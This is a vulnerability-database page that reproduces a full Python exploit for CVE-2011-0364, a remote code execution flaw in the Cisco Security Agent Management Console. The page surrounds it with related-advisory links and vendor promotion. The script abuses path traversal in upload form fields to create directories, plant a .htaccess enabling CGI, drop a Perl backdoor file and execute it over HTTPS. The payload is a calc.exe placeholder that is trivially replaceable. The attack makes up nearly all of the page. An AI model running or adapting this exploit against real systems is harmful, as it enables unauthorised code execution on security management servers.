Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cisco Security Agent Management Console ‘st_upload’ RCE Exploit

🗓️ 13 Apr 2011 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 14 Views

Cisco Security Agent 'st_upload' RCE Exploit targeting Cisco Security Agent Management Console, using HTTP POST requests to execute Remote Code Execution with potential security vulnerabilities

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Cisco Security Agent Management Console ‘st_upload’ RCE Exploit
13 Apr 201100:00
zdt
ATTACKERKB		Cisco Security Agent Management Console st_upload File Creation
19 Feb 201100:00
attackerkb
Circl		CVE-2011-0364
12 Apr 201100:00
circl
Cisco		Management Center for Cisco Security Agent Remote Code Execution Vulnerability
16 Feb 201116:00
cisco
Tenable Nessus		Management Center for Cisco Security Agents Remote Code Execution (cisco-sa-20110216-csa)
18 Sep 201300:00
nessus
Check Point Advisories		Cisco Security Agent Management Center Code Execution (CVE-2011-0364)
3 Apr 201100:00
checkpoint_advisories
CVE		CVE-2011-0364
18 Feb 201123:00
cve
Cvelist		CVE-2011-0364
18 Feb 201123:00
cvelist
Exploit DB		Cisco Security Agent Management Console - 'st_upload' Remote Code Execution
12 Apr 201100:00
exploitdb
exploitpack		Cisco Security Agent Management Console - st_upload Remote Code Execution
12 Apr 201100:00
exploitpack
Rows per page

                                                #!/usr/bin/env python
# Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364)
# gerry eisenhaur <[email protected]>
 
import httplib
import mimetools
import StringIO
 
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"
 
# we need to enable some scripting to get command access
htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
backdoor = "exec \"calc.exe\";"
 
def send_request(params=None):
    buf = StringIO.StringIO()
    headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}
 
    for(key, value) in params.iteritems():
        buf.write('--%s\r\n' % _boundary)
        buf.write('Content-Disposition: form-data; name="%s"' % key)
        buf.write('\r\n\r\n%s\r\n' % value)
    buf.write('--' + _boundary + '--\r\n\r\n')
    body = buf.getvalue()
 
    conn = httplib.HTTPSConnection(_csamc)
    conn.request("POST", "/csamc60/agent", body, headers)
    response = conn.getresponse()
    print response.status, response.reason
    conn.close()
 
def main():
    ### Build up required dir tree
    dirtree = ["../bin/webserver/htdocs/diag/bin",
               "../bin/webserver/htdocs/diag/bin/webserver",
               "../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
    _params = {
        'host_uid': _host_uid,
        'jobname': None,
        'host': "aa",
        'diags': " ",
        'diagsu': " ",
        'profiler': " ",
        'extension': "gee",
    }
    for path in dirtree:
        print "[+] Creating directory: %s" % path
        _params['jobname'] = path
        send_request(_params)
 
    ### Done building path, drop files
    print "[+] Dropping .htaccess"
    send_request({
        'host_uid': _host_uid,
        'jobname': '',
        'host': "/../bin/webserver/",
        'diags': "",
        'diagsu': "",
        'profiler': htaccess,
        'extension': "/../.htaccess",
    })
 
    print "[+] Dropping payload"
    send_request({
        'host_uid': _host_uid,
        'jobname': '',
        'host': "/../bin/webserver/htdocs/gerry",
        'diags': perl_path,
        'diagsu': "",
        'profiler': backdoor,
        'extension': "/../exploit.gee",
    })
 
    print "[+] Done, Executing dropped file."
    try:
        conn = httplib.HTTPSConnection(_csamc, timeout=1)
        conn.request("GET", "/csamc60/exploit.gee")
        response = conn.getresponse()
        print response.status, response.reason
        print response.read()
    except httplib.ssl.SSLError:
        pass
    print "[+] Finished."
 
if __name__ == '__main__':
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Apr 2011 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.1312
cisco security agentrce exploithttp postremote code executionsecurity vulnerabilities
14